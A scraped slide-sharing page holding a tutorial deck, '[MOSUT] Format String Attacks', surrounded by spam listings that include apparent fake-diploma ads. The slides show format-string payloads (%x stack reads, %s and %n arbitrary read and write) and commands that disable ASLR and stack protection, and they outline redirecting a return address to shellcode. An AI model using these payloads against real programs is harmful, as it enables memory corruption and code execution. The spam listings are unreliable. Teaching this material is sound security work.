Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...
Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...Authentic No 1 Amil Baba In Pakistan
 
Module-2-Lesson-2-COMMUNICATION-AIDS-AND-STRATEGIES-USING-TOOLS-OF-TECHNOLOGY...
Module-2-Lesson-2-COMMUNICATION-AIDS-AND-STRATEGIES-USING-TOOLS-OF-TECHNOLOGY...Module-2-Lesson-2-COMMUNICATION-AIDS-AND-STRATEGIES-USING-TOOLS-OF-TECHNOLOGY...
Module-2-Lesson-2-COMMUNICATION-AIDS-AND-STRATEGIES-USING-TOOLS-OF-TECHNOLOGY...JeylaisaManabat1
 
南新罕布什尔大学毕业证学位证成绩单-学历认证
南新罕布什尔大学毕业证学位证成绩单-学历认证南新罕布什尔大学毕业证学位证成绩单-学历认证
南新罕布什尔大学毕业证学位证成绩单-学历认证kbdhl05e
 
(南达科他州立大学毕业证学位证成绩单-永久存档)
(南达科他州立大学毕业证学位证成绩单-永久存档)(南达科他州立大学毕业证学位证成绩单-永久存档)
(南达科他州立大学毕业证学位证成绩单-永久存档)oannq
 
Virtue ethics & Effective Altruism: What can EA learn from virtue ethics?
Virtue ethics & Effective Altruism: What can EA learn from virtue ethics?Virtue ethics & Effective Altruism: What can EA learn from virtue ethics?
Virtue ethics & Effective Altruism: What can EA learn from virtue ethics?Mikko Kangassalo
 
integrity in personal relationship (1).pdf
integrity in personal relationship (1).pdfintegrity in personal relationship (1).pdf
integrity in personal relationship (1).pdfAmitRout25
 
Spiritual Life Quote from Shiva Negi
Spiritual Life Quote from Shiva Negi Spiritual Life Quote from Shiva Negi
Spiritual Life Quote from Shiva Negi OneDay18
 
Inspiring Through Words Power of Inspiration.pptx
Inspiring Through Words Power of Inspiration.pptxInspiring Through Words Power of Inspiration.pptx
Inspiring Through Words Power of Inspiration.pptxShubham Rawat
 

Dernier (8)

Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...
Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...
Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...
 
Module-2-Lesson-2-COMMUNICATION-AIDS-AND-STRATEGIES-USING-TOOLS-OF-TECHNOLOGY...
Module-2-Lesson-2-COMMUNICATION-AIDS-AND-STRATEGIES-USING-TOOLS-OF-TECHNOLOGY...Module-2-Lesson-2-COMMUNICATION-AIDS-AND-STRATEGIES-USING-TOOLS-OF-TECHNOLOGY...
Module-2-Lesson-2-COMMUNICATION-AIDS-AND-STRATEGIES-USING-TOOLS-OF-TECHNOLOGY...
 
南新罕布什尔大学毕业证学位证成绩单-学历认证
南新罕布什尔大学毕业证学位证成绩单-学历认证南新罕布什尔大学毕业证学位证成绩单-学历认证
南新罕布什尔大学毕业证学位证成绩单-学历认证
 
(南达科他州立大学毕业证学位证成绩单-永久存档)
(南达科他州立大学毕业证学位证成绩单-永久存档)(南达科他州立大学毕业证学位证成绩单-永久存档)
(南达科他州立大学毕业证学位证成绩单-永久存档)
 
Virtue ethics & Effective Altruism: What can EA learn from virtue ethics?
Virtue ethics & Effective Altruism: What can EA learn from virtue ethics?Virtue ethics & Effective Altruism: What can EA learn from virtue ethics?
Virtue ethics & Effective Altruism: What can EA learn from virtue ethics?
 
integrity in personal relationship (1).pdf
integrity in personal relationship (1).pdfintegrity in personal relationship (1).pdf
integrity in personal relationship (1).pdf
 
Spiritual Life Quote from Shiva Negi
Spiritual Life Quote from Shiva Negi Spiritual Life Quote from Shiva Negi
Spiritual Life Quote from Shiva Negi
 
Inspiring Through Words Power of Inspiration.pptx
Inspiring Through Words Power of Inspiration.pptxInspiring Through Words Power of Inspiration.pptx
Inspiring Through Words Power of Inspiration.pptx
 

[MOSUT] Format String Attacks

  • 2. About Me • Study in National Chung Cheng University • The simulator of 5 axis CNC machine tool • CUDA programming for the collision detection in real time • 若渴計畫 & MOSUT
  • 3. Outline • Illustrating format string vulnerabilities • A case study • • • • • fsa.c Compile and setup insecure environment Viewing the stack Viewing memory at any location Overwriting of arbitrary memory • So, you can…
  • 4. Format String Vulnerabilities • format string <->argv[1] • printf(argv[1]) • strcpy(buff,argv[1]) • snprintf(buf,sizeof buf,argv[1]); •… • EX: compile & execute
  • 6. A Case Study: Compile and Setup Insecure Environment • Compile • gcc -g -Wno-format-security -fno-stack-protector fsa.c • Disable ASLR(address space layout randomization) • sudo sysctl -w kernel.randomize_va_space=0 • X86 machine & Unbuntu 12.04
  • 7. Stack Status before Executing snpritf() esp ?? ?? ?? x = 97 = ‘a’ buf[100] stack
  • 8. Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) Buffer length argv[1] pointer ?? b7ff3fec ?? bfffff3b4 c call convention http://descent-incoming.blogspot.tw/2012/11/pascal-call-convention-in-c.html ?? 0 x = 97 = ‘a’ buf[100] Richard Reese,透視c語言指標 p.128
  • 9. Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) fetch Buffer length argv[1] pointer stack %x ?? b7ff3fec %x ?? bfffff3b4 %x ?? 0 %x x = 97 = ‘a’ %x buf[100]
  • 10. Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer Buffer length • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) argv[1] pointer ?? b7ff3fec ?? bfffff3b4 ?? 0 copy x = 97 = ‘a’ %x?? Execution order of “copy” and “fetch” are switched by OS buf[100]=b7ff3fec. Bfffff3b4. 0.61.66663762(ff7b)
  • 11. Viewing the Stack: “aaaa.%x.%x.%x.%x.%x” • Format string = aaaa.%x.%x.%x.%x.%x heap “aaaa.%x.%x.%x.% x.%x” Buffer pointer • ‘a’ is 0x61 in ASCII • snprintf(buf, sizeof buf, “aaaa.%x.%x.%x.%x.%x”) Buffer length argv[1] pointer %x ?? b7ff3fec %x ?? bfffff3b4 %x ?? 0 %x x = 97 = ‘a’ %x buf[100]=aaaa.b7ff3f ec.bffff3a4.0.61.6161 6161
  • 12. Viewing Memory at Any Location • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%x • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%s bffff2f8 x = 97 = ‘a’ %s buf[0]=bffff2f8
  • 13. Overwriting of Arbitrary Memory • The %n field was encountered in the format string • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%n 26(??) alignment bffff2f8 x = 97 = ‘a’ %s buf[0]=bffff2f8 bffff2f8 x = 28 = 0x1c %n buf[0]=bffff2f8
  • 14. So, You Can… • Format string vulnerabilities • Viewing the stack • Finding return addresses • Overwriting return address • Overwriting return addresses to point to shellcode • EX: $ ./a.out $(printf “return address”).%x.%x.%x.%x.%n => retrun address = 28 $ ./a.out $(printf “return address”).%x.%x.%x.%4x.%n => retrun address = 30 $ ./a.out $(printf “return address”).%x.%x.%x.%8x.%n => retrun address = 34 $ ./a.out $(printf “return address”).%Xx.%Yx.%Zx.%Ax.%n => retrun address = shellcode address
  • 15. You can overwrite arbitrary memory, if there are format string vulnerabilities
  • 16. Reference • Tim Newsham, “Format String Attacks” • http://www.thenewsh.com/~newsham/format-string-attacks.pdf • stackoverflow,“How can a Format-String vulnerability be exploited?” • http://stackoverflow.com/questions/7459630/how-can-a-format-string-vulnerabilitybe-exploited • Paul Haas, Advanced Format String Attacks • http://www.defcon.org/images/defcon-18/dc-18-presentations/Haas/DEFCON-18Haas-Adv-Format-String-Attacks.pdf • David Brumley, Cource sliedes • http://users.ece.cmu.edu/~dbrumley/courses/18739c-s11/slides/0127.pdf • Scut et al,”Exploiting Format String Vulnerabilities” • http://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf